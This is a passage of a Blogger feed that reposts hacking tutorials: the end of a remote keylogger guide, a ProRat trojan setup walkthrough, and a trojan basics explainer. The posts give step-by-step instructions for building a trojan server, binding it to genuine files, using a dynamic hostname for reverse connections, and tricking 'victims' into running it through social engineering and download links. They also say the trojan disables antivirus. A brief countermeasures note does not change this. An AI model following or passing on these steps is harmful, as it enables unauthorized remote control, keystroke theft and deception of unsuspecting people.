&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&amp;nbsp;&amp;nbsp;
 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;
 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSQSgLr3zHI/AAAAAAAAADc/kjrB_2E7Iyo/s1600/key14.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;279&quot; src=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSQSgLr3zHI/AAAAAAAAADc/kjrB_2E7Iyo/s320/key14.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSQSiqwkuWI/AAAAAAAAADg/kSBxd68YJWg/s1600/key15.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;275&quot; src=&quot;http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSQSiqwkuWI/AAAAAAAAADg/kSBxd68YJWg/s320/key15.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSQSkGyDFmI/AAAAAAAAADk/51U4dnlDsBc/s1600/key16.jpg&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;277&quot; src=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSQSkGyDFmI/AAAAAAAAADk/51U4dnlDsBc/s320/key16.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&amp;nbsp;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: 13px;&quot;&gt;You can change icon of exe file (keylogger engine) if you wish&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSQSm1SqI2I/AAAAAAAAADo/fxRYkbBon7I/s1600/key17.jpg&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;278&quot; src=&quot;http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSQSm1SqI2I/AAAAAAAAADo/fxRYkbBon7I/s320/key17.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&amp;nbsp;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: 13px;&quot;&gt;Just go through the Summary information and click finish.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div&gt;
So you have got an exe file which is detectable as a virus by
 antiviruses. Now use social engineering to make victim to click on this
 exe file and hopefully you would start getting the keylogs and 
screenshots in your account. You cant send it as an attachment in email 
ID. The good way is to uplaod it on any uploading site and give him the 
dowloading link.&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div&gt;
Have fun :)&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;br /&gt;NOTE: Guys This Post is Copied From&amp;nbsp; (Www.ExploreHacking.Com) &lt;/div&gt;
&lt;div&gt;
&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/4012025811832192855/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2012/04/remote-keylogger-configure-and-use.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/4012025811832192855'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/4012025811832192855'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2012/04/remote-keylogger-configure-and-use.html' title='Remote Keylogger - configure and use'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSQilo0l4VI/AAAAAAAAADs/1OVmJrlCc0Y/s72-c/keystrokes.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-4508505962688682260</id><published>2012-04-22T15:15:00.004-07:00</published><updated>2013-09-05T06:45:38.194-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="General"/><title type='text'>Trojan Horse | RAT | Configure and Use | Tutorial- Part 2</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Just go through the Part 1 which includes the basics of &amp;nbsp;Trojan &lt;a href=&quot;http://www.explorehacking.com/2011/01/trojan-horse-basics-part-1.html&quot;&gt;Click here&lt;/a&gt;.
 This tutorial&amp;nbsp;is about configuring and using a trojan. There are many 
trojans available on internet for free. Some popular ones are Beast, Pro
 Rat, Netbus , Back Orifice, Girlfriend, Sub 7. I will be using Pro Rat 
in this tutorial.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Requirements&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #990000;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #990000;&quot;&gt;1. Prorat-&lt;/span&gt;&lt;/b&gt;&lt;a href=&quot;http://www.prorat.net/downloads.php&quot;&gt;&amp;nbsp;Click here&lt;/a&gt; to download Trojan Prorat.&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #990000;&quot;&gt;2. Hostname &lt;/span&gt;&lt;/b&gt;&amp;nbsp;-
 &amp;nbsp;Your IP address would probably be dynamic that it keeps changing 
everytime you disconnect and reconnect. You need a host name which 
always automatically keep pointing to your changing IP. Follow these 
steps -:&lt;br /&gt;
&lt;br /&gt;
1. Log On to www.no-ip.com and register for an account.&lt;br /&gt;
2. Go to Hosts/Redirects -&amp;gt; Add Host and choose any free available 
hostname. Do not change any other option and simply click on Create 
Host.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TUViknumbVI/AAAAAAAAAJw/wnJQcn98IS0/s1600/add.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;311&quot; src=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TUViknumbVI/AAAAAAAAAJw/wnJQcn98IS0/s400/add.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
3. Downloading and install their DNS update client available here&amp;nbsp;&lt;a href=&quot;http://www.no-ip.com/downloads.php&quot;&gt;http://www.no-ip.com/downloads.php&lt;/a&gt;&amp;nbsp;Run it and enter your credentials. Update your host name and save it.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://1.bp.blogspot.com/_ufGdCaQ3M3k/TUVimDGw9UI/AAAAAAAAAJ0/-ypluGHWw2k/s1600/duc.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;148&quot; src=&quot;http://1.bp.blogspot.com/_ufGdCaQ3M3k/TUVimDGw9UI/AAAAAAAAAJ0/-ypluGHWw2k/s200/duc.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
4.
 Lets check whether your IP has been associate with chosen host name or 
not. Go to command prompt and type &#39;ping yourhostname&#39; (without quotes) ,
 hopefully it should reply with your IP address.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://4.bp.blogspot.com/_ufGdCaQ3M3k/TUVintSwJnI/AAAAAAAAAJ4/VO8ybt5jpwo/s1600/ping.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;137&quot; src=&quot;http://4.bp.blogspot.com/_ufGdCaQ3M3k/TUVintSwJnI/AAAAAAAAAJ4/VO8ybt5jpwo/s400/ping.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: medium;&quot;&gt;Tutorial for configuring Trojan.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1&lt;/b&gt;. Open prorat.exe that you have downloaded.&lt;br /&gt;
&lt;b&gt;2&lt;/b&gt;. Click on Create &amp;nbsp;and then Create ProRat Server&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TUVcoQQwx0I/AAAAAAAAAJc/2SLQd9ByFzU/s1600/pro1.jpg&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;323&quot; src=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TUVcoQQwx0I/AAAAAAAAAJc/2SLQd9ByFzU/s320/pro1.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&lt;b&gt;3.&lt;/b&gt; &amp;nbsp;Enter your host name in the ProRat Notification field as shown. Uncheck all other options.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://1.bp.blogspot.com/_ufGdCaQ3M3k/TUVct0wRqgI/AAAAAAAAAJg/y6fEpqR-lXY/s1600/pro2.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;338&quot; src=&quot;http://1.bp.blogspot.com/_ufGdCaQ3M3k/TUVct0wRqgI/AAAAAAAAAJg/y6fEpqR-lXY/s400/pro2.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;4.&lt;/b&gt;
 Click on general settings Tab and have a look at server port,password, 
victim name. Remember these things.Check out and configure other options
 as per your need. You can bind server.exe with any genuine file, 
change&amp;nbsp;its icon etc.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://4.bp.blogspot.com/_ufGdCaQ3M3k/TUVcxuKpZmI/AAAAAAAAAJk/h0lDZw2GyrQ/s1600/pro3.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;343&quot; src=&quot;http://4.bp.blogspot.com/_ufGdCaQ3M3k/TUVcxuKpZmI/AAAAAAAAAJk/h0lDZw2GyrQ/s400/pro3.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;5&lt;/b&gt;.
 Finally click on create &amp;nbsp;server and now its ready to be sent to victim.
 &amp;nbsp;Once victim installs it, it would automatically disable 
antivirus/firewall.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Modes of sending-:&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
You must be thinking of sending this server.exe to victim through an 
email as an attachment but&amp;nbsp;unfortunately you cant do so. The good option
 is &amp;nbsp;to upload it on any uploading site like mediafire.com and 
give&amp;nbsp;downloading link to victim.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What after victim has run the server part ?&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt;Click on ProConnective Tab and start listening to connections. Allow firewall if it asks you to open a port.&lt;br /&gt;
&lt;b&gt;2&lt;/b&gt;.You will start listening to connections, I mean you will get a notification as shown when victim would be online.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TUVj4-htayI/AAAAAAAAAJ8/ffgHKpq_lZg/s1600/pro5.jpg&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TUVj4-htayI/AAAAAAAAAJ8/ffgHKpq_lZg/s1600/pro5.jpg&quot; /&gt;&lt;/a&gt;&lt;a href=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TUVc0vTaxpI/AAAAAAAAAJo/G_w_WrUSyh4/s1600/pro4.jpg&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;288&quot; src=&quot;http://2.bp.blogspot.com/_ufGdCaQ3M3k/TUVc0vTaxpI/AAAAAAAAAJo/G_w_WrUSyh4/s320/pro4.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Note: &lt;/b&gt;If you know victim is online and still its not listening to
 any connections. Trace victim&#39;s IP,enter in IP field&amp;nbsp;and hit connect. 
But its gonna work only if he is not behind any network and directly 
connected to internet. If you dont know how to trace IP, mention in 
comments.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What after successful connection ?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
After you have managed to connect to 
victim&#39;s machine. There are numberless interesting things to do. I 
leave&amp;nbsp;this part on you. &amp;nbsp;Have Fun.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;b&gt;How to make it undetectable from antivirus ?&lt;/b&gt;&lt;br /&gt;
Though there isn&#39;t any hard and fast way to make it fully undetectable 
from all antiviruses. The real way to do it is modify the source code of
 open source trojans available. Its very challenging job. There are many
 crypters which claim to make it undetectable but unfortunately hardly 
one out every hundred works. I would try to write next article on the 
same.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Contermeasure against Trojans -&lt;/b&gt;&lt;br /&gt;
The obvious coutermeasure against trojans is that do not accept downloading links blindly. Keep your antivirus up to date.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Detecting and removing Trojan -&lt;/b&gt;&lt;br /&gt;
Though trojan once installed is very hard to remove . It would hide itself from the &lt;b&gt;Task Manager . &lt;/b&gt;Install&amp;nbsp;&lt;a href=&quot;http://en.wikipedia.org/wiki/Process_Explorer&quot;&gt;Process Explorer&lt;/a&gt;
 and it would hopefully show you all process running including trojan. 
Kill the process and remove it. One good thing is to carefully check the
 open ports and services running through &#39;netstat&#39; command. Anyways , 
the best option is to reinstall the windows.&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;Feel free to ask &amp;nbsp;the queries in comments :)&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;&lt;br /&gt;NOTE: Guys This Post is Copied From&amp;nbsp; (Www.ExploreHacking.Com) &lt;/i&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/4508505962688682260/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2012/04/trojan-horse-rat-configure-and-use.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/4508505962688682260'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/4508505962688682260'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2012/04/trojan-horse-rat-configure-and-use.html' title='Trojan Horse | RAT | Configure and Use | Tutorial- Part 2'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_ufGdCaQ3M3k/TUViknumbVI/AAAAAAAAAJw/wnJQcn98IS0/s72-c/add.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-6218395817014477191</id><published>2012-04-22T15:14:00.000-07:00</published><updated>2013-09-05T06:45:38.215-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="General"/><title type='text'>Trojan Horse (Basics) - Part 1</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Have you watched movie &lt;b&gt;Troy ? &lt;/b&gt;okay
 lets leave . Have your wallpaper ever changed automatically ? Have the 
programs ever started without your initiation ? Have the browser opened 
unexpected websites automatically ? Simply have you ever felt that 
someone else is controlling your computer ? &lt;b&gt;NO ?&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Congrats, you probably haven&#39;t been a victim of trojan yet :).&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;A trojan horse is a remote administration tool(RAT). This is some thing extremely dangerous. &amp;nbsp;A trojan gives&amp;nbsp;&lt;/b&gt;&lt;b&gt;the full control of victim&#39;s PC to the attacker.&amp;nbsp;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&amp;nbsp;A trojan has two parts . One is &lt;b&gt;client part (Control Panel)&lt;/b&gt; and other is &lt;b&gt;server part&lt;/b&gt; (meant to be sent to victim).&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;The basic methodology of using a trojan is as follows:-&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;1.&lt;/b&gt; Attacker creates an executable file of size in kbs. This &amp;nbsp;is &amp;nbsp;server part of trojan and mostly called as server.exe&lt;/div&gt;
&lt;a href=&quot;http://3.bp.blogspot.com/_ufGdCaQ3M3k/TRN7W-XmD-I/AAAAAAAAAAo/HIMtDmmq1Rg/s1600/trojan+infected.jpg&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: justify;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;191&quot; src=&quot;http://3.bp.blogspot.com/_ufGdCaQ3M3k/TRN7W-XmD-I/AAAAAAAAAAo/HIMtDmmq1Rg/s200/trojan+infected.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-weight: normal;&quot;&gt;&lt;b&gt;2&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-weight: normal;&quot;&gt;.Attacker
 might hide this server.exe behind any genuine file like a song or 
image. Attacker gives this file to victim&amp;nbsp;and victim is supposed to 
double click on it.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;3&lt;/b&gt;.As victim run that server 
part , a port on victim&#39;s computer gets opened and attacker can control 
his&amp;nbsp;PC sitting remotely in any part of the world through the control 
panel(client part). Attacker can do anything with&amp;nbsp;victim&#39;s computer 
remotely that victim himself can do on his computer.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;i&gt;Note: Now I am assuming that you know a little bit about IP addresses that is lan/internal/private and wan/external/public IP.&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Two different methods of working of Trojan.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;1. Direct Connection &lt;/b&gt;: In this 
method, after the server part has been installed on victim&#39;s machine, 
the attacker&amp;nbsp;enters the public IP address assigned to victim&#39;s computer 
for making a connection to it. But limitations&amp;nbsp;of direct connection is 
that public IP address is most probably dynamic and gets changed 
everytime one&amp;nbsp;disconnects and reconnects. So attacker needs to find out 
IP address of victim each time.Moreover the incoming connection like 
this is usually restricted by firewall. &lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;The
 main limitation of direct connection is that you can not access the 
victim who is behind a router or a network beacuse victim&#39;s machine is 
not assigned public/external/wan IP. It is only assigned 
private/internal/lan IP which is useless or meaningless for computers 
outside that network.The wan IP belongs to his router.&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;
&lt;b&gt;It doesnt matter how attacker is connected to internet. Attacker can be connected to internet any of three means.&lt;/b&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://3.bp.blogspot.com/_ufGdCaQ3M3k/TSbQCusCwsI/AAAAAAAAAF8/G6GFhmHUaGg/s1600/direct1.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;425&quot; src=&quot;http://3.bp.blogspot.com/_ufGdCaQ3M3k/TSbQCusCwsI/AAAAAAAAAF8/G6GFhmHUaGg/s640/direct1.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Victim is behind a router in this case. (havent inserted the picture of victim behind a network, imagine that )&lt;/b&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSbVRTp0hCI/AAAAAAAAAGI/ZEy99VwiUYY/s1600/direct2.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;321&quot; src=&quot;http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSbVRTp0hCI/AAAAAAAAAGI/ZEy99VwiUYY/s400/direct2.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;2. Reverse Connection:&lt;/b&gt;
 In this method, attacker enters his own IP address in server part while
 configuring it .So when the server part is installed on victim&#39;s 
computer, it automatically makes connection with client part that&amp;nbsp;is 
attacker. Also the firewall in victim&#39;s machine would not restrict to 
outgoing connections. Problem in this case is same that attacker&#39;s IP is
 also dynamic. But this can be over come easily. Attacker 
actually&amp;nbsp;enters a domain name in server part which always points to his 
dynamic IP.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: medium;&quot;&gt;Reverse connection can bypass a router or a network.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSbQI2WanuI/AAAAAAAAAGE/1MgbXifXMPc/s1600/reverse.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;448&quot; src=&quot;http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSbQI2WanuI/AAAAAAAAAGE/1MgbXifXMPc/s640/reverse.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;You might be confused at this point. Kindly mention your queries/doubts in comments.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;NOTE: Guys This Post is Copied From&amp;nbsp; (Www.ExploreHacking.Com)&lt;/b&gt;&lt;br /&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/6218395817014477191/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2012/04/trojan-horse-basics-part-1.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/6218395817014477191'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/6218395817014477191'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2012/04/trojan-horse-basics-part-1.html' title='Trojan Horse (Basics) - Part 1'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_ufGdCaQ3M3k/TRN7W-XmD-I/AAAAAAAAAAo/HIMtDmmq1Rg/s72-c/trojan+infected.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-5383231781114296308</id><published>2012-04-20T16:55:00.002-07:00</published><updated>2013-09-06T07:09:54.955-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><title type='text'>Top 10 Security/Hacking Tools &amp; Utilities</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;br /&gt;
